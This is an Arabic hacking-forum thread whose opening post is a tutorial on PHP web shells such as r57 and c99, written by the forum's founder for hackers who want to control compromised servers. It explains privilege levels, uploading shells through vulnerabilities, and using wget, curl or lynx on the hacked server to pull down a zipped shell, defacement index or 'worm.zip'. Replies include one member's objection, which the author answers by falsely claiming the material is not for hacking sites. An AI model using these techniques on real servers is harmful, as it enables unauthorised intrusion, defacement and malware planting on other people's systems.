03-09-2009, 03:14 AM
|
رقم المشاركة : [1] | |
|
:: عبدالله النصر ::
:: مؤسس المعهد :: 
|
الشيل !! ما هو و انواعه وشرح كيف يتم رفعه وايضاُ وشرحه واوامره
بسم الله الرحمن الرحيم في البداية اكثر الاعضاء يسالون ماهو الشل؟ وما الفائده منه وما هو استخداماته؟ وكيف يتم رفعه ؟ وماهي اوامره؟ اليوم جايبكم عشان نجاولب على كل الاسئله دى ماهو الشل؟ وهو عبارة عن سكربت مكتوب بلغة php***** ويعمل الشل كوسيط بينك وبين النظام الذي هو Linux حيث يستقبل الاوامر منك ويرسلها الى السيرفر المخترق وتعرض نتائج الاوامر على الشل. ما هو استخدامه ؟ الان الكل يسمع عن الشل وما يعرف شنو استخداماته وانا اقولك له استخدامات كثيرة فنحن الهكرز نستخدمه في السيطرة على السيرفرات !! والان جينا للمفيد يستخدم للسيطرة على السيرفر واحيانا السيطرة بشكل كامل على السيرفر والتنقل بالسيرفر ووتصفح ملفاته والتعديل عليها واحيانا يستخدم فى فك الزاند وهذا حسب صلاحياتك على السيرفر واكيد راح تقولي ايه هيه صلاحياتي ؟؟ وانا اقولك الصلاحيات يعني انت ايه على السيرفر يعنى ايه موقعك عليه الصلاحيات على السيرفر 1- Root اي انت مدير السيرفر يعني خلاص مافي شي يوقف قدامك تحذف تعدل تضيف حساب على السيرفر وكذا 2- User هنا صلاحياتك على الموقع الي انت رافعلة شل فقط اكرر على الموقع الي انت رافعلة شل فقط اي تعدل تعطي تصاريح الا اذا انتقلت لحالة الرووت 3- no****, http, apache هنا كلها نفس الشي ما تقدر تحذف ملفات او تعطي تصاريح للملفات ولكن هذه الصلاحيات فيها ميزة حلوة وهي انك تقدر تتصفح الحسابات الي على السيرفر اي المواقع التي على السيرفر عكس صلاحيات اليوزر حيث صلاحياتك على الموقع الي انت رافعلة شل فقط ولكن في سؤال مهم وهي اكيد انت راح تقولي كيف اعرف صلاحياتي على السيرفر؟ وانا اقولك وانت في الشل تكتب id لمعرفة صلاحياتك وهو امر لينكس ومن الكلام الي سبق اكيد انت استنجت شي وهي انك حتى تشغل الشل لازم ترفعة على موقع واكيد في سؤال بالطريق وهو كيف ارفع الشل على موقع؟ وانا اقولك ولا يهمك يتم رفع الشل عن طريق الثغرات واكيد راح تسأل وتقول ايه هي الثغرة؟ وانا اجاوبك مع انك مللتني من كثر اسالتك الثغرة: وهي عبارة عن خطأ برمجي وضعف امني يساعدك في دخول نظام معين واختراقه وهذا الخطأ يمكننا استغلاله في أن نجعل النظام يقوم بتنفيذ أوامرنا التي نعطيها إليه واحيانا تساعدك الثغرة في الانتقال من حالة الى اخرى اي مثلا من نوبدي الى رووت حسب نوع الثغرة والثغرات تكون مكتوبة بلغة السي او البيرل او php الخ..... والان الحمد لله عرفتوا شنو الثغرة ولنفترض انك تمكنت من رفع شل على موقع ولكن اكيد انت تبي تعرف والان بعد ما الكل عرف ما هو الشل وانواعة واستخداماته راح اشرح لكم الشل الروسى r57***** الشل الروسي الغني عن التعريف الذي انا افضله من بين كل هذه الشلات وهو يحتاج الى اوامر لينكس ولكن فيه اوامر البحث عن ملفات الكونفك واوامر سحب الملفات اي الدوال لسحب الملفات جاهزة كلها وفيه ميزة تحميل ملفات من جهازك الى الموقع المخترق من خلاله واما الاصدار الجديد منه (موجود في المنتدى اصداره الجديد منزله الاخ متكي ورا الشمس) فقد اضيفت له ثغرات وشغلات جميلة اكتشفها بنفسك الان اليكم الشرح حسب الترقيم في الصورة: 1- phpinfo هنا لمشاهدة البرامج المثبته على السيرفر وسوف اشرحها في درس اخر 2- السيف مود اوف والسيف مود هو حالة امنة يتم تفعيلها على السيرفر لمنع تطبيق الدوال. 3- اصدار الينكس للسيرفر المخترق مع اخر تحديث له وهو 2005 4- id وهو كما ذكرت صلاحياتك على السيرفر وهي نوبدي 5- pwd مسارك على السيرفر اي مكان تواجدك - هنا تكتب امر اللينكس مثلا id لمعرفة صلاحياتك 2- هنا المسار الذي انت عليه او اكتب pwd لمعرفة مسارك 3- هنا للتنفيذ اي عند كتابة امر اللينكس اضغط على هذا المستطيل (بالعربي اكتب الامر واضغط انتر) والان اشرح لكم دوال سحب الملفات والان اليكم الشرح وسوف اشرح على الدالة wget في البداية كشرح خفيف لمعرفة ان الدالة wget شغالة يجب كتابة الامر which wget وكما تلاحظون كتبنا الامر which wget في مربع تنفيذ الاوامر ونضغط انتر وشوفو النتيجة: والان كما تلاحظون ظهر لنا الرد الذي في الصورة وهو usr/bin/wget/ اي ان الدالة شغالة والان نكتب امر السحب ولكن قبل كل ذلك يجب ان تتأكد من ان المجلد الذي سوف تسحب الشل له يملك التصريح 777 كما تلاحظون الاختيارات: 1- هذا هو التصريح 777 الذي يجب ان يكون بدون شرطات كما في الصورة 2- هذا الاختيار هو المجلد الذي سوف نسحب له الملف الذي نريد والان كل شي جاهز المجلد ذو التصريح والملف الذي سوف نسحبه وانا هنا سوف اسحب الشل ch99 للتوضيح لا اكثر ويمكن انت بهذه الطريقة ان تسحب الاندكس الخاصة بالاختراق او اي شي اخر والان اكتب في مكان تنفيذ الاوامر كود بلغة HTML: wget Huntvb Link Protection -67653 والشرح للايعاز wget دالتنا التي سوف نسحب بها الملف والموقع الذي بجنبها رفعنا له الشل مضغوط علشان نسحبه للموقع المخترق وعند كتابة الايعاز لن يظهر لك اي رد والان نحن رفعناه مضغوط فيجب فك ضغطه بالايعاز unzip *****.zip كما تلاحظون الرد المحاط بالاحمر يدل على نجاح العملية والان ماذا لو لم تعمل هذه الدالة؟ اقولك ولا يهمك في دوال غيرها مثلا دالة curl ايضا اذا اردت التحقق من ان الدالة تعمل ما عليك الا كتابة which curl واليكم شرح بعض دوال السحب ولنفترض ان الملف الذي نود سحبه هو worm.zip نبدا بالاداة lynx وطريقة سحب الملف كما يلي كود بلغة HTML:
GET Huntvb Link Protection -18578 > worm.zip وكما شرحنا سابقا site.com هو الموقع الذي رفعنا الشل مضغوط له واذا اردتم معلومات اكثر عن رفع الشل شوفوا موضوعي في قسم المواضيع المتميزة لرفع الشل والان نكمل شرح الشل الروسي لنفترض انك عندك ملف وتبي ترفعة للسيرفر والملف على جهازك هتعمل اية؟؟؟ الاختيار 1- هنا لاختيار الملف من جهازك ومعناه استعراض brouse 2- هذا الاختيار معناه رفع اي عند الانتهاء من اختيار الملف من جهازك اضغط عليه والان شرح خفيف عن المسار الذي نحن فيه؟؟ كود PHP:
او يكون على اسم الموقع كما في مسارنا او يكون www والي اخره حسب السيرفر والحين عرفتوا احنا ليش مو على المجلد الرئيسي ولكن اكيد راح تقولي ابي اصير على المجلد الرئيسي وانا اقول تامر امر احذف المجلد html واكتب الايعاز التالي كود PHP:
بسط جدا وارجو من الله ان تكون قد استفدتم من هذا الدرس بارك الله فيكم |
|
|
|
|
03-09-2009, 10:28 AM
|
رقم المشاركة : [2] | |
|
:: أبو علي ::
:: إدارة المعهد ::
|
رد: الشيل !! ما هو و انواعه وشرح كيف يتم رفعه وايضاُ وشرحه واوامره
بارك الله فيك أخوي عبدالله
واصل تميزك يالغالي |
|
|
|
|
|
04-24-2009, 12:39 PM
|
رقم المشاركة : [3] |
|
:: عضـو جديد ::
|
رد: الشيل !! ما هو و انواعه وشرح كيف يتم رفعه وايضاُ وشرحه واوامره
اخي في اللغة اخي ربما في الدم ايضا اخي في الانسانية اخي في الله
اناشدك باسم الحب الدي يجمع بين اهل القلوب الطيبة والخيرة على ان تعدل عن هده البرامج وشرحها على العامة . اخي وعزيزي هده جريمة في حق نفسك اولا قبل ان تكون في حق الاخرين . ( الدال على الشر كفاعله ) والحكمة تقول= كل واحد ينفق من الشيء الي اعطاهلو ربي = وارجو ان يكون قلبك طيب ورحيم وان تعمل عكس ماقدمته . تعمل في مكافحة هده الظاهرة الشريرة وتجعل عبقريتك في تخليص اخوانك الطيبين والمساكين من البشر من هده البرانج السيئة التي تعرضت لها كثيرا وما وجدت منقدا الا الفرمتة اخي ارجو اني احببتك ..اخوك هاي من الجزائر شكرا شكرا شكرا ------- ------ ----- |
|
|
|
|
04-24-2009, 12:56 PM
|
رقم المشاركة : [4] |
|
:: عضـو جديد ::
|
رد: الشيل !! ما هو و انواعه وشرح كيف يتم رفعه وايضاُ وشرحه واوامره
 اخي فلا اشجعك عن عمل المنكر واقول ممتاز مشكورواصل يابطل لالالالالالالالالالالالالالالالالال الالالالالالالالالالالالالالالالالا لالالالالالالا غير من السيء الى الاحسن ... وخصوصا كان شعارك (( محمد )) صلى الله عليه وسلم ارجو واتمنى حبيبي ان اكون سببا في ارجاعك عن فعل الخطاء اخوك وحبيبك هادي من الجزائر ---------------------------------------- |
|
التعديل الأخير تم بواسطة HADI ; 04-24-2009 الساعة 12:59 PM. |
|
|
|
|
|
04-24-2009, 04:22 PM
|
رقم المشاركة : [5] | ||
|
:: عبدالله النصر ::
:: مؤسس المعهد ::
|
رد: الشيل !! ما هو و انواعه وشرح كيف يتم رفعه وايضاُ وشرحه واوامره
اقتباس:
انت مفكر لغه الشيل لإختراق المواقع ؟؟؟؟؟ يالغلا هاذي لغه شيل السيرفر وليس لإختراق المواقع هاذي للسيرفراااااااااااااااااات وليس منكر بارك الله فيك ؟ يعطيك العافيه ومشكور على مرورك |
||
|
|
|
|
04-25-2009, 10:31 AM
|
رقم المشاركة : [6] |
|
:: عضـو جديد ::
|
رد: الشيل !! ما هو و انواعه وشرح كيف يتم رفعه وايضاُ وشرحه واوامره
اطلب منك العفو ان كنت قد اسات بك الظن العفو اخى .
قد اكون جهلت في قراءتي للموضوع اكرر طلب العفو حبيبي اجوك هادي من الجزائر عفوا عفوا عفوا ------ ------ -------- عندنا حكمة تقول = ( الي تلدغ من الحية يخاف من الحبل ) شكرا شكرا ------ -------- |
|
|
|
|
04-25-2009, 07:03 PM
|
رقم المشاركة : [7] | |
|
:: عبدالله النصر ::
:: مؤسس المعهد ::
|
رد: الشيل !! ما هو و انواعه وشرح كيف يتم رفعه وايضاُ وشرحه واوامره
العفو اخوي وشكرا للرد يالغلا
مرورك أسعدني |
|
|
|
|
|
04-27-2009, 02:26 PM
|
رقم المشاركة : [8] |
|
:: عضـو جديد ::
|
رد: الشيل !! ما هو و انواعه وشرح كيف يتم رفعه وايضاُ وشرحه واوامره
راني فرحان ومسرور بزاف بزاف
عندما شملني عفوك واصفحت عن زلتي يا سيدي مشكووووووووووووووو ر . هادي من الجزائر --------------------- |
|
|
|
|
05-02-2009, 03:48 AM
|
رقم المشاركة : [9] | |
|
:: إدارة المعهد ::
|
رد: الشيل !! ما هو و انواعه وشرح كيف يتم رفعه وايضاُ وشرحه واوامره
ج ــآزآكـ اللـه كـــل خ ــير .
|
|
|
|
|
|
08-14-2009, 04:25 PM
|
رقم المشاركة : [10] | |
|
:: فريق الإدارة ::
|
رد: الشيل !! ما هو و انواعه وشرح كيف يتم رفعه وايضاُ وشرحه واوامره
شكرا لك أخي موضوع مفيد جداا ،،
|
|
|
|
|
 |
| مواقع النشر (المفضلة) |
| الكلمات الدلالية (Tags) |
| الشيل , انواعه , رفعه , وايضاُ , واوامره , وشرح , وشرحه |
| الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1) | |
| أدوات الموضوع | |
| انواع عرض الموضوع | |
|
|
شات صوتي - منتديات مغربية - منتديات - الحلم الوردي
|
|
العرض العادي
